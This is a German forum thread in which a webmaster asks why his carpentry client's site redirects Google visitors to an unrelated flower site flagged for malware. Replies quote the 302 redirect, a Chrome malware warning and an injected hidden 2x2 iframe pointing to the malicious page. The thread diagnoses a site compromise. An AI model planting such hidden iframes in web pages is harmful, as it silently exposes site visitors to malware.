mediengestalter.info
FAQ :: Mitgliederliste :: MGi Team

Willkommen auf dem Portal für Mediengestalter

Aktuelles Datum und Uhrzeit: Fr 26.04.2024 17:59 Benutzername: Passwort: Auto-Login

Thema: Google: Nicht erwünschte Weiterleitung? vom 23.11.2012


Neues Thema eröffnen   Neue Antwort erstellen MGi Foren-Übersicht -> Web-Software -> Google: Nicht erwünschte Weiterleitung?
Seite: 1, 2, 3  Weiter
Autor Nachricht
nullhorn
Threadersteller

Dabei seit: 22.02.2006
Ort: Brend-City
Alter: 39
Geschlecht: Männlich
Verfasst Fr 23.11.2012 11:00
Titel

Google: Nicht erwünschte Weiterleitung?

Antworten mit Zitat Zum Seitenanfang

Hi Leuz,

// Falls ich hier falsch sein sollte, bitte ich den Mod es zu verschieben. //

Es handelt sich um die Domain www.schreinerei-scheuplein.de - wenn man diese in Google eingibt (so wie es viele Menschen der etwas "älteren" Generation wohl immer häufiger machen, also die nutzen nicht die Adresszeile um die Domain einzugeben sondern geben in Google "www.domain.de" ein) dann wird auch die Adresse und Ihre Unterseiten als oberste Ergebnisse ausgegeben. Wenn ich nun aber auf die Ergebnisse klicke werde ich automatisch auf http://art-and-flower.de/hmod.html weitergeleitet. Das soll und darf natürlich so nicht sein, ich weiß nicht warum Google das so macht, die eine hat mit der anderen Firma nicht zu tun, weder geografisch naheliegend noch gleiches Gewerbe noch Geschäftsbeziehungen.

Nun frage ich mich als Admin der Seite, was ich tun kann um dies zu unterbinden?
Liegt das an Google oder an dem Betreiber der anderen Seite?

Grüße
Flo
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
JanG

Dabei seit: 13.10.2002
Ort: Köln/Düsseldorf
Alter: -
Geschlecht: Männlich
Verfasst Fr 23.11.2012 11:21
Titel

Antworten mit Zitat Zum Seitenanfang

Wenn ich auf den Schreinerlink klicke, lande ich auch bei artandflowers. Da brauch ich nicht mal google für.

Peaze!
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
Anzeige
Anzeige
Mischpult

Dabei seit: 19.11.2003
Ort: Bochum
Alter: -
Geschlecht: Männlich
Verfasst Fr 23.11.2012 11:53
Titel

Antworten mit Zitat Zum Seitenanfang

Code:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://art-and-flower.de/hmod.html">here</a>.</p>
<hr>
<address>Apache Server at www.schreinerei-scheuplein.de Port 80</address>
</body></html>


www.schreinerei-scheuplein.de leitet doch anscheinend absichtlich auf art-and-flower.de weiter

Was genau moechtest Du denn jetzt?
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
jense

Dabei seit: 04.11.2003
Ort: Dizzledope
Alter: 47
Geschlecht: Männlich
Verfasst Fr 23.11.2012 12:05
Titel

Antworten mit Zitat Zum Seitenanfang

Code:
Achtung: Malware!
Google Chrome hat Zugriff auf diese Seite auf art-and-flower.de blockiert.
Auf dieser Webseite wurden Inhalte von www.innovative-floristik.de eingefügt, einem bekannten Verbreiter von Malware. Beim Besuch dieser Seite besteht jetzt die Gefahr, dass Sie Ihren Mac mit Malware infizieren.
Malware ist Schadsoftware, die unter anderem zu Identitätsdiebstahl, finanziellen Verlusten und zum dauerhaften Löschen von Dateien führen kann.
  View user's profile Private Nachricht senden
DEKONSTRUKTIV

Dabei seit: 22.06.2009
Ort: bln
Alter: -
Geschlecht: -
Verfasst Fr 23.11.2012 12:36
Titel

Re: Google: Nicht erwünschte Weiterleitung?

Antworten mit Zitat Zum Seitenanfang

nullhorn hat geschrieben:
Das ... darf natürlich so nicht sein


aha?
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
nullhorn
Threadersteller

Dabei seit: 22.02.2006
Ort: Brend-City
Alter: 39
Geschlecht: Männlich
Verfasst Fr 23.11.2012 15:48
Titel

Antworten mit Zitat Zum Seitenanfang

Also ich bin Admin und Ersteller dieser Seite, ich habe die Seite geschrieben und hochgeladen. Außer mir hat kein anderer berechtigten Zugriff auf die Seite.

Hier der Header der Indexseite:
Zitat:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Schreinerei Scheuplein</title>
<meta name="keywords" content="Schreinerei Scheuplein" />
<meta name="description" content="Schreinerei Scheuplein" />
<meta name="robots" content="index,follow" />
<meta http-equiv="content-language" content="de" />
<meta name="author" content="Florian Haaf" />
<meta name="revisit-after" content="2 days" />

<link rel="stylesheet" type="text/css" href="css/style.css" />
<link rel="stylesheet" type="text/css" href="css/lightbox.css" media="screen" />

<script src="../js/prototype.js" type="text/javascript"></script>
<script src="../js/scriptaculous.js?load=effects,builder" type="text/javascript"></script>
<script src="../js/lightbox.js" type="text/javascript"></script>

</head>

<body>


Wenn ich in meine Adresszeile die Domain www.schreinerei-scheuplein.de eingebe und auslöse komme ich auf die Seite drauf. Wenn ich es über Google mache komme ich zu dieser flower Seite. Das möchte - verständlicherweise hoffe ich - unterbinden!
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
Bollwitz

Dabei seit: 28.07.2009
Ort: Hamburg
Alter: 50
Geschlecht: Männlich
Verfasst Fr 23.11.2012 16:03
Titel

Antworten mit Zitat Zum Seitenanfang

Dir ist klar, dass der Link, den Du hier hinterlassen hast, auch direkt auf innovative-floristik verweist? Das hat dann also nix mit Google zu tun, schätze ich mal. Vielleicht mal beim Provider nachhaken, warum das verlinken der Seite nicht funktioniert.. * Keine Ahnung... *
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
jense

Dabei seit: 04.11.2003
Ort: Dizzledope
Alter: 47
Geschlecht: Männlich
Verfasst Fr 23.11.2012 16:12
Titel

Antworten mit Zitat Zum Seitenanfang

hast du dir den quellcode deiner seite mal genau angeguckt?

Code:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://art-and-flower.de/hmod.html></iframe></body>
  View user's profile Private Nachricht senden
 
Ähnliche Themen Wordpress -> Kundenlogin mit weiterleitung?
QR-Code mit direkter Weiterleitung
MODx und Google Analytics
google maps IE Workaround
Google Analytics sharen
Google Analytics - Zugriffe aus Russland
Neues Thema eröffnen   Neue Antwort erstellen Seite: 1, 2, 3  Weiter
MGi Foren-Übersicht -> Web-Software


Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst an Umfragen in diesem Forum nicht mitmachen.